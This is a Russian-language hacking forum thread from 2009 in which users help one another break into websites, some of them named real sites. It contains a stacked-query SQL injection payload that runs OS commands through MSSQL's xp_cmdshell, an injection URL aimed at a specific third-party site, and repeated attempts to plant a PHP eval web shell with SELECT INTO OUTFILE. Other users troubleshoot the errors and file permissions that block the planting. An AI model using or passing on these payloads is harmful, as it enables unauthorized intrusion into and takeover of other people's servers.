ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
06.10.2009, 19:53
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Сообщение от Ctacok
И так
Твой запрос приводит к ошибке.
Error pulling cat information from database: (SELECT cat_na as cat, maincat FROM cfaq_cats WHERE catid = 24) Unknown column 'cat_na' in 'field list'
Т.е. intval() нету, что неплохо.
Зато просто ограничение в 2 символа 
Если хочешь, крути скулю в лимит 2 символа  Конечно хочу, просто покажи пожалуйста как версию вывести, а дальше уж я сам своё чёрное дело сделаю.
|
|
|
06.10.2009, 20:00
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Упс, не заметил по этому поводу демократию, извиняюсь. Всё понял, как бы SQL, но в тоже время и не SQL вовсе =)))
Пасиба. Обломился празник ;(
|
|
|
|
07.10.2009, 21:47
|
|
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
Провел на форуме:
5749763
Репутация:
1680
|
|
Слышал, что через SQL в базе данных MSSql реально выполнить cmd команды, но дел с этой БД никогда не имел, если это не миф, то просьба, показать на этом примере:
sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version—
Или объясните плз, при каком условии можно выполнить cmd команду на сервере.
|
|
|
|
07.10.2009, 22:29
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
Провел на форуме:
5301021
Репутация:
1879
|
|
www.site.ru/index.asp?user=1'; exec master..xp_cmdshell 'CMD COMMAD HERE' --
|
|
|
|
07.10.2009, 22:55
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Сообщение от Nightmarе
Слышал, что через SQL в базе данных MSSql реально выполнить cmd команды, но дел с этой БД никогда не имел, если это не миф, то просьба, показать на этом примере:
sagiv.co.il/main.asp?cat=site&sel_nav1=1+or+1=@@version—
Или объясните плз, при каком условии можно выполнить cmd команду на сервере.
Преимуществом этой СУБД есть то, что в скулях можно закрывать один запрос ( и выполненять другой... Поясню: Если есть уязвимый код, н.п.:
PHP код:
mssql_query('SELECT * FROM news WHERE id='.$_GET['id'].);
При подставке в id, н.п. 1, запрос в БД будет выглядеть так:
Код:
SELECT * FROM news WHERE id=1
Это понятно Но можно сделать так:
Код:
?id=1; exec master..xp_cmdshell 'здесь комманда консоли винды'
тогда первый запрос будет
Код:
SELECT * FROM news WHERE id=1
второй:
Код:
exec master..xp_cmdshell 'здесь комманда консоли винды'
Про "exec", "master..xp_cmdshell" почитай в гугле
PS: Но exec не всегда разрешен. В большинстве случаев - только при пользователе "su" (это как root в MySQL)
Последний раз редактировалось mailbrush; 07.10.2009 в 23:03..
|
|
|
|
08.10.2009, 06:55
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Пользователь sa =)
Nightmare - https://forum.antichat.ru/thread30501-mssql.html
Последний раз редактировалось krypt3r; 08.10.2009 в 07:03..
|
|
|
|
08.10.2009, 09:39
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
Всем привет,такая проблема:
Есть рут от пхпадмина phpMyAdmin 2.6.2-Debian,
Выполняю запрос:
Код:
select '<?php eval($_GET[e]); ?>' into outfile '/var/www/new/pma/1.php'
получаю
Код:
SQL-запрос: Документация
SELECT '<?php eval($_GET[e]); ?>'
INTO OUTFILE '/var/www/new/pma/1.php'
Ответ MySQL: Документация
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
пути правельные из пхпинфо взял.
Зарание спасибо
Последний раз редактировалось Shadrin; 08.10.2009 в 09:50..
|
|
|
|
08.10.2009, 09:52
|
|
Познавший АНТИЧАТ
Регистрация: 27.04.2007
Сообщений: 1,044
Провел на форуме:
3660186
Репутация:
905
|
|
Попробуйте
Код:
SELECT ... FROM sometable INTO OUTFILE ...
где sometable - имя существующей таблицы |
|
|
|
08.10.2009, 10:33
|
|
Постоянный
Регистрация: 20.08.2008
Сообщений: 348
Провел на форуме:
2200171
Репутация:
270
|
|
krypt3r спасибо уже что то ,
Код:
SQL-запрос: Документация
SELECT '<?php eval($_GET[e]); ?>'
FROM db
INTO OUTFILE '/var/www/osiatis_new/landesk/ll.php'
Ответ MySQL: Документация
#1 - Can't create/write to file '/var/www/new/11/ll.php' (Errcode: 13)
все равно каким то боком кавычки мешают(
jokester
выполняю запросы в поле
Выполнить SQL запрос(ы) на БД
UPD можешь ради интереса попробовать вот так:
вылетает
Код:
#1064 - You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1
И проверил пользователя
root ALL PRIVILEGES
К примеру отбросим фильтр кавычек ,и смтря на первую ошибку получается что запись невозможна?
Последний раз редактировалось Shadrin; 08.10.2009 в 10:46..
|
|
|
|
08.10.2009, 10:39
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
Shadrin
Хех, это я протупил, krypt3r прав, у тебя база просто 4, я неподумал. Теперь просто ошибка записи в папку. тоесть прав нет попросту Ищи папку на запись.
Последний раз редактировалось jokester; 08.10.2009 в 11:00..
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
